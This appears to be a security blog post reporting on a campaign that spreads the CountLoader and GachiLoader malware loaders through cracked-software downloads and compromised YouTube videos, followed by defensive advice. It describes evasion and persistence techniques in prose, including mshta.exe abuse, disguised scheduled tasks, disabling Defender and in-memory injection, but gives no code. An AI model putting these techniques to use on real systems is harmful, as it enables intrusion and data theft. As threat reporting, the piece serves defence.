Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware

on

 

Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware

In late 2025, cybersecurity researchers uncovered a sophisticated and expanding malware distribution campaign that leverages two entirely different but complementary attack vectors — pirated software download sites and compromised YouTube videos — to deliver dangerous malware loaders like CountLoader and GachiLoader. This campaign represents a growing trend in which cybercriminals blend social engineering, legitimate-looking download lures, multi-stage payloads, and the abuse of trusted platforms to compromise victims globally. The Hacker News+1

At its core, this threat showcases how popular user behaviors — such as searching for cracked software or game cheats — are being exploited to bypass traditional security defenses and infect systems with powerful malware families capable of stealing data, maintaining persistence, and enabling further illicit activity. Cypro

The Infection Landscape: Cracked Software as a Malware Vector

1. Why Cracked Software Is Risky

Cracked or pirated software has long been a security minefield. Users seeking unauthorized copies of expensive applications — from office suites to creative tools and games — often download installers hosted on unverified sites. These sites frequently bundle malicious content to lure in victims, promising free or “unlock” versions of premium products.

In the current campaign, malware operators have exploited this habit by embedding next-stage malware loaders inside the download packages presented as cracked software. Users believe they’re installing a working version of a legitimate product, but what they actually execute is a hidden payload that fetches and runs malware in the background. radar.offseq.com

CountLoader: The Multi-Stage Malware Loader

2. What Is CountLoader?

CountLoader is a modular malware loader that functions as an intermediate stage in a larger infection chain. It does not immediately execute the final malware on its own. Instead, CountLoader’s purpose is to:

  • Establish persistence

  • Evade security defenses

  • Fetch and execute additional malicious files

  • Enable flexible payload delivery depending on the threat actor’s objectives

This modular design allows attackers to customize the malware that ultimately runs on the target machine, making CountLoader a valuable foothold in modern campaigns. radar.offseq.com

3. How Users Get Infected

In the observed attack chain:

  1. Victims visit cracked software sites, often prompted by search results or links shared in forums.

  2. When initiating a download for a desired product (like a cracked version of Microsoft Word), the victim is redirected to a file-hosting service such as MediaFire, where a ZIP archive awaits.

  3. The ZIP contains:

    • An encrypted secondary archive

    • A Word document containing the password to open that archive

    • A renamed legitimate Python interpreter labeled Setup.exe, which actually contains malicious instructions

  4. When the victim runs Setup.exe, it uses the Windows utility mshta.exe to fetch CountLoader 3.2 from a remote server. radar.offseq.com

This step is key — by bundling CountLoader behind a seemingly legitimate utility (Python renamed as Setup.exe) and then using mshta.exe (a trusted Microsoft HTML Application host), the attackers bypass many traditional static security checks, effectively launching the loader without raising immediate suspicion. radar.offseq.com

4. Persistence and Evasion Techniques

Once executed, CountLoader demonstrates several sophisticated behaviors:

  • Persistent Scheduled Task: A scheduled task is created using a misleading name like “GoogleTaskSystem136.0.7023.12”, configured to run every 30 minutes for up to a decade.

  • Security Tool Detection: The malware checks for certain security tools like CrowdStrike Falcon using Windows Management Instrumentation (WMI). Depending on results, execution commands are adapted to avoid detection.

  • Flexible Payload Delivery: CountLoader supports multiple payload actions including downloading and executing executables, DLLs, MSI packages, or Python modules.

  • USB Spreading: It can propagate via removable media by creating malicious shortcuts (LNK files) that run both the original file and the malware.

  • Memory-Only Execution: Payloads can be executed directly in memory (e.g., via PowerShell), enabling fileless execution to evade disk-based defenses. radar.offseq.com

Finally, in observed infections, CountLoader has been used to deliver ACR Stealer — a data-harvesting malware that exfiltrates sensitive information from compromised hosts. radar.offseq.com

YouTube Ghost Network and GachiLoader

5. The YouTube Component of the Campaign

Parallel to the cracked software vector, researchers also identified another delivery mechanism through what’s been dubbed the YouTube Ghost Network. In this scheme:

  • Threat actors compromise legitimate YouTube accounts to upload videos that promise cracked software, game cheats, or other enticing content.

  • These videos contain descriptions and links prompting users to download ZIP archives with accompanying passwords — much like the cracked software route.

  • Viewers unwittingly download malware payloads disguised as installers or utilities. Check Point Research

According to security analysts, more than 100 YouTube videos linked to this campaign were identified, accumulating roughly 220,000 views. The videos were spread across dozens of compromised channels over a period stretching back to December 2024. While many have since been removed after being reported, others are likely to reappear under different accounts in the future. Check Point Research

GachiLoader: Stealthy Node.js Malware Loader

6. Introduction to GachiLoader

Unlike CountLoader, which is a modular executable loader, GachiLoader is a heavily obfuscated malware loader written in Node.js. This is notable because most malware is traditionally developed in compiled languages like C/C++ — making a Node.js loader unusual and harder for many traditional security solutions to detect. Check Point Research

GachiLoader’s job, like CountLoader’s, is to serve as a staging point for additional malware — often deploying sophisticated data stealers or other payloads once it has established its presence. Check Point Research

7. Advanced Infection and Evasion Techniques

As part of its operation, GachiLoader employs multiple anti-analysis and stealth techniques, including:

  • Privilege Checks: It runs commands like net session to detect if it’s being debugged or run without required privileges. If it’s not elevated, it attempts to trigger a User Account Control (UAC) prompt, often tricking users into granting permissions.

  • Security Process Manipulation: GachiLoader attempts to terminate Microsoft Defender components such as SecHealthUI.exe and modify Defender exclusions to avoid detection of its staged malware.

  • PE Injection Innovation: In some cases, GachiLoader uses a novel Portable Executable (PE) injection technique that abuses Vectored Exception Handling to load malicious payloads stealthily in memory — bypassing many traditional detection methods.

  • Repeat Payload Delivery: The loader can fetch its final malware directly or through a second-stage loader (referred to as Kidkadi) to further complicate analysis. Check Point Research

One identified final payload delivered via GachiLoader is the Rhadamanthys infostealer, a malware designed to harvest sensitive data from victims once deployed. Check Point Research

Implications of the Campaign

This multi-vector distribution campaign has several profound implications for cybersecurity:

8. Exploiting User Behavior

By leveraging cracked software and YouTube videos, attackers are exploiting trusted or familiar channels that many users interact with routinely. This makes detection by average users difficult, as downloads appear legitimate at first glance. Cypro

9. Evasion of Traditional Defenses

Both CountLoader and GachiLoader use advanced evasion techniques — from scheduled tasks mimicking legitimate services, to fileless execution and anti-analysis checks that make automatic scanning and sandboxing less effective. radar.offseq.com+1

10. Persistent and Flexible Threat Models

The modular architecture of these loaders means attackers can deliver a wide range of payloads — from credential stealers to remote access tools — depending on their goals. They can adapt the infection chain to target individuals, corporations, or larger infrastructures with custom malware configurations. radar.offseq.com

Defending Against These Threats

Given the sophistication and stealth of these campaigns, organizations and individual users should adopt layered defenses:

11. Avoid Cracked Software

The single most effective mitigation is to never download or install pirated or cracked software. These files are frequently laden with hidden malware that can compromise even well-protected systems. radar.offseq.com

12. Educate Users

Organizations should train users to recognize the risks of third-party download sites and YouTube content promoting unauthorized software or game cheats. Awareness reduces the likelihood of initial infection. Check Point Research

13. Harden Endpoint Security

  • Deploy advanced endpoint detection and response (EDR) capable of spotting fileless executions and suspicious in-memory behaviors.

  • Restrict execution of system utilities that are often abused by malware (e.g., mshta.exe, PowerShell) unless absolutely required.

  • Monitor for unusual scheduled tasks, unexpected network connections, or changes to security software configurations. radar.offseq.com

14. Secure Removable Media Policies

Given CountLoader’s ability to spread via USB removable drives, instituting strict scanning and autorun restrictions for external drives is crucial. radar.offseq.com

A Growing Trend in Malware Distribution

The cracked software and YouTube malware campaign exemplifies how attackers evolve their distribution tactics by abusing familiar platforms and user behaviors to deliver complex multi-stage malware. This campaign combines social engineering, modular malware development, stealthy execution techniques, and exploitation of trusted platforms — illustrating the need for modern security strategies that go beyond simple antivirus tools.

Whether it’s CountLoader’s multi-stage modular loading or GachiLoader’s advanced Node.js obfuscation and injection techniques, users and defenders must recognize that malware is no longer simple — it’s adaptable, hidden behind everyday online activities, and designed to evade detection until it’s too late. Cypro

Comments

Post a Comment